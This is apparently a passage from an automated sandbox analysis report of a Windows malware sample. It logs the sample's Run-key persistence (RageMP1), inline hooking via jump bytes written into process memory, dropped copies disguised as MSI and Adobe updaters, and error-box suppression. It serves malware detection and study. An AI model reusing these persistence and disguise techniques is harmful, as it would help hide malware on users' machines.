Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP1

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1210005 value: E9 8B 2F CF 75	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 76F02F90 value: E9 7A D0 30 8A	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1220005 value: E9 2B BA CA 75	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 76ECBA30 value: E9 DA 45 35 8A	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1230008 value: E9 8B 8E CE 75	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 76F18E90 value: E9 80 71 31 8A	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1250005 value: E9 8B 4D 9A 74	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 75BF4D90 value: E9 7A B2 65 8B	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1260005 value: E9 EB EB 9A 74	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 75C0EBF0 value: E9 1A 14 65 8B	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1270005 value: E9 8B 8A D6 73	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 74FD8A90 value: E9 7A 75 29 8C	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 1280005 value: E9 2B 02 D8 73	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Memory written: PID: 1804 base: 75000230 value: E9 DA FD 27 8C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: C90005 value: E9 8B 2F 27 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 76F02F90 value: E9 7A D0 D8 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: CA0005 value: E9 2B BA 22 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 76ECBA30 value: E9 DA 45 DD 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: ED0008 value: E9 8B 8E 04 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 76F18E90 value: E9 80 71 FB 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: EF0005 value: E9 8B 4D D0 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 75BF4D90 value: E9 7A B2 2F 8B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: F00005 value: E9 EB EB D0 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 75C0EBF0 value: E9 1A 14 2F 8B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: F10005 value: E9 8B 8A 0C 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 74FD8A90 value: E9 7A 75 F3 8B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: F20005 value: E9 2B 02 0E 74	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Memory written: PID: 3336 base: 75000230 value: E9 DA FD F1 8B	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 13E0005 value: E9 8B 2F B2 75	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 76F02F90 value: E9 7A D0 4D 8A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 13F0005 value: E9 2B BA AD 75	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 76ECBA30 value: E9 DA 45 52 8A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 1400008 value: E9 8B 8E B1 75	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 76F18E90 value: E9 80 71 4E 8A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 1420005 value: E9 8B 4D 7D 74	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 75BF4D90 value: E9 7A B2 82 8B	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 1430005 value: E9 EB EB 7D 74	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 75C0EBF0 value: E9 1A 14 82 8B	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 1440005 value: E9 8B 8A B9 73	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 74FD8A90 value: E9 7A 75 46 8C	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 1450005 value: E9 2B 02 BB 73	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5224 base: 75000230 value: E9 DA FD 44 8C	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 630005 value: E9 8B 2F 8D 76	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 76F02F90 value: E9 7A D0 72 89	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1420005 value: E9 2B BA AA 75	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 76ECBA30 value: E9 DA 45 55 8A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1430008 value: E9 8B 8E AE 75	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 76F18E90 value: E9 80 71 51 8A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1460005 value: E9 8B 4D 79 74	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 75BF4D90 value: E9 7A B2 86 8B	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1470005 value: E9 EB EB 79 74	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 75C0EBF0 value: E9 1A 14 86 8B	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1480005 value: E9 8B 8A B5 73	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 74FD8A90 value: E9 7A 75 4A 8C	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 1490005 value: E9 2B 02 B7 73	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Memory written: PID: 5344 base: 75000230 value: E9 DA FD 48 8C	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 12A0005 value: E9 8B 2F C6 75
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 76F02F90 value: E9 7A D0 39 8A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 12B0005 value: E9 2B BA C1 75
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 76ECBA30 value: E9 DA 45 3E 8A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 12C0008 value: E9 8B 8E C5 75
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 76F18E90 value: E9 80 71 3A 8A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 2C80005 value: E9 8B 4D F7 72
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 75BF4D90 value: E9 7A B2 08 8D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 2C90005 value: E9 EB EB F7 72
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 75C0EBF0 value: E9 1A 14 08 8D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 2CA0005 value: E9 8B 8A 33 72
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 74FD8A90 value: E9 7A 75 CC 8D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 2CB0005 value: E9 2B 02 35 72
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Memory written: PID: 5568 base: 75000230 value: E9 DA FD CA 8D

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
